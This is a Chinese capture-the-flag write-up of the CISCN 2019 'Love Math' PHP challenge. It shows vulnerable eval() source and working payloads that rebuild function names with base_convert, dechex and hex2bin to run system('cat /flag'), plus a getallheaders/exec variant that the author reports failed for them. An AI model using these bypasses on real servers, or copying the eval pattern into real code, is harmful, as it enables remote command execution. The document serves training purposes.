[CISCN 2019 初赛]Love Math

进入之后直接就是源码

<?php
// 关闭所有错误报告，以防止将敏感信息泄露给用户
error_reporting(0);

// 检查是否传入了 GET 参数 'c'
// 如果没有传入，则显示当前文件的源代码
if (!isset($_GET['c'])) {
    show_source(__FILE__);
} else {
    // 读取 GET 参数 'c' 的值到 $content
    $content = $_GET['c'];

    // 如果 $content 的长度超过 80 字符，则终止执行并输出错误信息
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }

    // 定义一个黑名单字符数组，包含空格、制表符、回车、换行、引号、反引号和方括号
    $blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];

    // 遍历黑名单字符数组，检查 $content 是否包含任意黑名单字符
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }

    // 定义一个白名单函数数组，包含常用的数学函数
    // 这些函数是允许在用户输入中使用的函数
    $whitelist = [
        'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 
        'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 
        'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 
        'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 
        'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 
        'sinh', 'sqrt', 'srand', 'tan', 'tanh'
    ];

    // 使用正则表达式匹配 $content 中所有可能的函数名称，并存储在 $used_funcs 数组中
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);

    // 遍历 $used_funcs 数组，检查是否有不在白名单中的函数名
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }

    // 使用 eval 函数计算并输出 $content 的值
    // 注意：eval 函数会执行传入的 PHP 代码，存在严重的安全风险
    eval('echo ' . $content . ';');
}
?>

方法一

有字符限制,有黑白名单
我们要利用

eval('echo ' . $content . ';');

去catflag
首先我们要了解

在 PHP 中，可以通过将函数名存储在一个字符串变量中，然后通过该变量动态调用该函数。这种方法被称为动态函数调用,例如:
$a='system';
$a('cat /flag');
就会执行system('cat /flag')

我们最终要做到的就是

?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag

白名单里有一个函数base_convert()
base_convert() 函数在任意进制之间转换数字
我们可以利用他来创造出hex2bin
hex2bin是由小写字母和数字组成符合36进制的规则

可以看出
hex2bin的36进制就是hex2bin
于是我们呢可以将hex2bin的10进制数转为hex2bin然后利用hex2bin再将_GET的转为16进制数转为字符串

base_convert(37907361743,10,36)//hex2bin
dechex(1598506324)//5f474554就是_GET的十六进制
//dechex（） 函数将十进制数转换为十六进制数
组成base_convert(37907361743,10,36)(dechex(1598506324))=>hex2bin(5f474554)=_GET
之所以用dechex而不是继续用base_convert是因为有长度限制

构造出_GET接下来就可以直接打了

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
//就是:c=$pi=_GET;$_GET['pi']($_GET('abs'))$pi=system&abs=cat /flag
=>c=$pi=_GET;system('cat /flag')$pi=system&abs=cat /flag
最终可以看为system("cat /flag")

方法二

来自
https://www.cnblogs.com/20175211lyz/p/11588219.html
感觉这个方法很好
方法如下
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

$pi(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
最终exec(getallheaders(){1})
//操作xx和yy，中间用逗号隔开，echo都能输出
echo xx,yy
//getallheaders() 函数返回一个包含所有 HTTP 请求头的关联数组，其中数组的键是请求头的名称，值是对应的请求头值。

就是传
?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
在加一个请求头
1:cat /flag

不知道是什莫原因我一直不成功